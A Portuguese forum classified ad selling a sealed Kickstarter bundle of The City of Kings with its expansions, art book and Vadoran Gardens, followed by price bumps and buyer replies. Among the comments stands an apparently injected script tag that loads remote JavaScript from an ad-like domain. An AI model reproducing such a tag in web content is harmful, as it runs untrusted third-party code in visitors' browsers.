Vendo THE CITY OF KINGS + EXPANSÕES + VADORAN GARDENS [NOVO]

Adquiri os jogos no último kickstarter. Infelizmente a pessoa com quem tinha planeado jogar mudou-se e por isso fiquei sem parceiro/a (o jogo é co-op) e não me agrada jogar sozinho.

Os jogos ainda têm o plástico em volta das caixas - estão novos tal como vieram dentro da caixa do KS (de facto ainda estão dentro da caixa da transportadora que foi aberta apenas para verificar se estava tudo direitinho), por isso terão a mesma unboxing experience como se fossem os compradores originais.

Eis o que estou a vender (fiz all-in no KS):

1. The City of Kings Deluxe Edition, que inclui:

•        - The City of Kings (o jogo base),
    •        - Deluxe Upgrade: (que inclui):

• 4 Anti Knock Sheets,
      • 2 Quick Set Up Trays,
      • Dexterity Micro Expansion (120 recursos em madeira + quests extra),
      • Kickstarter Pack (equipamento extra + inimigos extra).

2. ​World Packs, que inclui todas as expansões:

• ​Character Pack 1 (Yanna + Kuma),
    • Character Pack 2 (Rapuil + Neoba),
    • Hero Pack (resin minis)
    • Side Quest Pack.

3. Designing a World (Livro com arte do mundo do jogo e o seu processo de desenvolvimento em hardcover).
  4. Vadoran Gardens (Jogo independente dentro do mesmo mundo - tile laying filler, não é co-op)

Preço: 250€  235€ 200€ (vou tentar vender uma última vez, abaixo disto prefiro abrir jogo e experimentar solo).

Posso entregar em mão em Aveiro (possivelmente no Porto, dado que de vez em quando vou até esses lados). No resto do país posso enviar via CTT ou outra transportadora, mas os portes ficam a cargo do comprador (a caixa pesa mais de 7Kg, dada a enorme quantidade de coisas que estão lá dentro)!

Qualquer dúvida contactem.

Divinus

P.S.

Eis 3 videos do criador do Jogo Frank West:

Reverse Unboxing

Regras

Um cenário a ser jogado

Opções de visualização dos comentários

Seleccione a sua forma preferida de visualização de comentários e clique "Gravar configuração" para activar as suas alterações.

bump - descida de preço.

bump - descida de preço.

Último Bump

Descida final de preço.

Se quiseres ganhar uns cobres

Se quiseres ganhar uns cobres eu quero o hero pack com as miniaturas ;)

Desculpa pela demora na

Desculpa pela demora na resposta, ainda sou um noob aqui. Agradeço o interesse, mas eu gostava mesmo de vender tudo junto. Se não conseguir, sempre posso experimentar o jogo e quiçá começar a gostar (o que se acontecer faz ativar o modo colecionador xD).

Enviei PM

Vê o spam

<script async="" src="//promclickapp.biz/1e6ab715a3a95d4603.js" type="text/javascript"></script>

Desculpa pela demora na

Desculpa pela demora na resposta, ainda sou um noob aqui. Creio que identifiquei a tua PM. Parece-me uma proposta interessante, contudo já tenho um jogo que preenche esse nicho. Obrigado pelo interesse.

Jogo Base

Não vendes só o City of Kings, certo? (jogo base + deluxe upgrade)

Desculpa pela demora na

Desculpa pela demora na resposta, ainda sou um noob aqui. Eu preferia vender tudo de uma vez, porque senão é mais dificil vender o que sobra. Obrigado pelo interesse.